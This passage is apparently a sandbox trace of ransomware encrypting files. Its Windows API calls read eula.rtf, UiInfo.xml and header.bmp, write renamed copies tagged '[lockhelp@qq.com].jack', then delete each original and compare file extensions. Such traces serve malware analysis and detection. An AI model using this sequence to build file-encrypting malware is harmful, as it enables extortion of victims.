(lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf")) returned 0x80 [0198.229] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.229] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.229] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.229] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.229] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0198.229] GetLastError () returned 0x0 [0198.229] ReadFile (in: hFile=0x3fc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xbfd, lpOverlapped=0x0) returned 1 [0198.266] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xc00, lpOverlapped=0x0) returned 1 [0198.267] ReadFile (in: hFile=0x3fc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.267] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0198.267] SetEndOfFile (hFile=0x404) returned 1 [0198.267] CloseHandle (hObject=0x404) returned 1 [0198.271] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.271] SetEndOfFile (hFile=0x3fc) returned 1 [0198.272] CloseHandle (hObject=0x3fc) returned 1 [0198.272] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.272] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf")) returned 1 [0198.273] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.273] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.273] lstrlenW (lpString=".doc") returned 4 [0198.273] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0198.273] lstrlenW (lpString=".docx") returned 5 [0198.273] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0198.273] lstrlenW (lpString=".pdf") returned 4 [0198.273] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0198.273] lstrlenW (lpString=".xls") returned 4 [0198.273] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0198.273] lstrlenW (lpString=".xlsx") returned 5 [0198.273] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0198.273] lstrlenW (lpString=".ppt") returned 4 [0198.273] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0198.273] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.273] lstrlenW (lpString=".zip") returned 4 [0198.273] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0198.273] lstrlenW (lpString=".rar") returned 4 [0198.273] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0198.273] lstrlenW (lpString=".bz2") returned 4 [0198.273] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0198.273] lstrlenW (lpString=".7z") returned 3 [0198.273] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0198.273] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.273] lstrlenW (lpString=".dbf") returned 4 [0198.273] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0198.273] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.273] lstrlenW (lpString=".1cd") returned 4 [0198.273] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0198.274] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.274] lstrlenW (lpString=".jpg") returned 4 [0198.274] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0198.274] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.274] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.274] lstrlenW (lpString=".doc") returned 4 [0198.274] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0198.274] lstrlenW (lpString=".docx") returned 5 [0198.274] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0198.274] lstrlenW (lpString=".pdf") returned 4 [0198.274] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0198.274] lstrlenW (lpString=".xls") returned 4 [0198.274] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0198.274] lstrlenW (lpString=".xlsx") returned 5 [0198.274] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0198.274] lstrlenW (lpString=".ppt") returned 4 [0198.274] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0198.274] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.274] lstrlenW (lpString=".zip") returned 4 [0198.274] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0198.274] lstrlenW (lpString=".rar") returned 4 [0198.274] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0198.274] lstrlenW (lpString=".bz2") returned 4 [0198.274] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0198.274] lstrlenW (lpString=".7z") returned 3 [0198.274] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0198.274] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.275] lstrlenW (lpString=".dbf") returned 4 [0198.275] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0198.275] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.275] lstrlenW (lpString=".1cd") returned 4 [0198.275] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0198.275] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0198.275] lstrlenW (lpString=".jpg") returned 4 [0198.275] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0198.275] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.275] lstrlenW (lpString="UiInfo.xml") returned 10 [0198.275] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0198.276] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=39042) returned 1 [0198.276] CloseHandle (hObject=0x430) returned 1 [0198.277] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml")) returned 0x80 [0198.277] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.277] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0198.277] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.277] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.277] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.279] GetLastError () returned 0x0 [0198.279] ReadFile (in: hFile=0x430, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x9882, lpOverlapped=0x0) returned 1 [0198.283] WriteFile (in: hFile=0x3fc, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x9890, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x9890, lpOverlapped=0x0) returned 1 [0198.285] ReadFile (in: hFile=0x430, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.285] WriteFile (in: hFile=0x3fc, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe8, lpOverlapped=0x0) returned 1 [0198.285] SetEndOfFile (hFile=0x3fc) returned 1 [0198.285] CloseHandle (hObject=0x3fc) returned 1 [0198.293] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.293] SetEndOfFile (hFile=0x430) returned 1 [0198.656] CloseHandle (hObject=0x430) returned 1 [0198.656] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.656] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml")) returned 1 [0198.657] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.657] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.657] lstrlenW (lpString=".doc") returned 4 [0198.657] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.657] lstrlenW (lpString=".docx") returned 5 [0198.657] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.657] lstrlenW (lpString=".pdf") returned 4 [0198.657] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.657] lstrlenW (lpString=".xls") returned 4 [0198.657] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.657] lstrlenW (lpString=".xlsx") returned 5 [0198.657] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.657] lstrlenW (lpString=".ppt") returned 4 [0198.657] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.657] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.657] lstrlenW (lpString=".zip") returned 4 [0198.657] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.657] lstrlenW (lpString=".rar") returned 4 [0198.657] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.657] lstrlenW (lpString=".bz2") returned 4 [0198.657] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.657] lstrlenW (lpString=".7z") returned 3 [0198.657] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.658] lstrlenW (lpString=".dbf") returned 4 [0198.658] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.658] lstrlenW (lpString=".1cd") returned 4 [0198.658] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.658] lstrlenW (lpString=".jpg") returned 4 [0198.658] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.658] lstrlenW (lpString=".doc") returned 4 [0198.658] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.658] lstrlenW (lpString=".docx") returned 5 [0198.658] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.658] lstrlenW (lpString=".pdf") returned 4 [0198.658] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.658] lstrlenW (lpString=".xls") returned 4 [0198.658] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.658] lstrlenW (lpString=".xlsx") returned 5 [0198.658] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.658] lstrlenW (lpString=".ppt") returned 4 [0198.658] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.658] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.658] lstrlenW (lpString=".zip") returned 4 [0198.658] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.658] lstrlenW (lpString=".rar") returned 4 [0198.659] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.659] lstrlenW (lpString=".bz2") returned 4 [0198.659] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.659] lstrlenW (lpString=".7z") returned 3 [0198.659] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.659] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.659] lstrlenW (lpString=".dbf") returned 4 [0198.659] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.659] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.659] lstrlenW (lpString=".1cd") returned 4 [0198.659] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.659] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0198.659] lstrlenW (lpString=".jpg") returned 4 [0198.659] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.659] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.659] lstrlenW (lpString="UiInfo.xml") returned 10 [0198.659] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0198.659] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=39050) returned 1 [0198.660] CloseHandle (hObject=0x430) returned 1 [0198.660] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml")) returned 0x80 [0198.660] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.660] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0198.660] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.660] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.660] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0198.662] GetLastError () returned 0x0 [0198.662] ReadFile (in: hFile=0x430, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x988a, lpOverlapped=0x0) returned 1 [0198.664] WriteFile (in: hFile=0x3f4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x9890, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x9890, lpOverlapped=0x0) returned 1 [0198.666] ReadFile (in: hFile=0x430, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.666] WriteFile (in: hFile=0x3f4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe8, lpOverlapped=0x0) returned 1 [0198.666] SetEndOfFile (hFile=0x3f4) returned 1 [0198.667] CloseHandle (hObject=0x3f4) returned 1 [0198.669] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.669] SetEndOfFile (hFile=0x430) returned 1 [0198.671] CloseHandle (hObject=0x430) returned 1 [0198.671] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.671] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml")) returned 1 [0198.672] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.672] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.672] lstrlenW (lpString=".doc") returned 4 [0198.672] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.672] lstrlenW (lpString=".docx") returned 5 [0198.672] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.672] lstrlenW (lpString=".pdf") returned 4 [0198.672] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.672] lstrlenW (lpString=".xls") returned 4 [0198.672] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.672] lstrlenW (lpString=".xlsx") returned 5 [0198.672] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.672] lstrlenW (lpString=".ppt") returned 4 [0198.672] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.672] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.672] lstrlenW (lpString=".zip") returned 4 [0198.672] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.672] lstrlenW (lpString=".rar") returned 4 [0198.672] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.672] lstrlenW (lpString=".bz2") returned 4 [0198.672] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.672] lstrlenW (lpString=".7z") returned 3 [0198.672] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.672] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.673] lstrlenW (lpString=".dbf") returned 4 [0198.673] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.673] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.673] lstrlenW (lpString=".1cd") returned 4 [0198.673] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.673] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.673] lstrlenW (lpString=".jpg") returned 4 [0198.673] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.673] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.673] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.673] lstrlenW (lpString=".doc") returned 4 [0198.673] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.673] lstrlenW (lpString=".docx") returned 5 [0198.673] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.673] lstrlenW (lpString=".pdf") returned 4 [0198.673] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.673] lstrlenW (lpString=".xls") returned 4 [0198.673] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.673] lstrlenW (lpString=".xlsx") returned 5 [0198.673] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.673] lstrlenW (lpString=".ppt") returned 4 [0198.673] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.673] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.673] lstrlenW (lpString=".zip") returned 4 [0198.673] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.673] lstrlenW (lpString=".rar") returned 4 [0198.673] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.674] lstrlenW (lpString=".bz2") returned 4 [0198.674] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.674] lstrlenW (lpString=".7z") returned 3 [0198.674] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.674] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.674] lstrlenW (lpString=".dbf") returned 4 [0198.674] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.674] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.674] lstrlenW (lpString=".1cd") returned 4 [0198.674] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.674] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0198.674] lstrlenW (lpString=".jpg") returned 4 [0198.674] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.674] lstrcmpiW (lpString1=".bmp", lpString2=".jack") returned -1 [0198.674] lstrlenW (lpString="header.bmp") returned 10 [0198.674] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0198.691] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3628) returned 1 [0198.691] CloseHandle (hObject=0x410) returned 1 [0198.692] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp")) returned 0x80 [0198.692] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\header.bmp.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.693] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0198.693] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.693] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.693] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\header.bmp.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0198.695] GetLastError () returned 0x0 [0198.695] ReadFile (in: hFile=0x3ec, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xe2c, lpOverlapped=0x0) returned 1 [0198.718] WriteFile (in: hFile=0x3f4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe30, lpOverlapped=0x0) returned 1 [0198.719] ReadFile (in: hFile=0x3ec, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.719] WriteFile (in: hFile=0x3f4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe8, lpOverlapped=0x0) returned 1 [0198.719] SetEndOfFile (hFile=0x3f4) returned 1 [0198.719] CloseHandle (hObject=0x3f4) returned 1 [0198.725] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.725] SetEndOfFile (hFile=0x3ec) 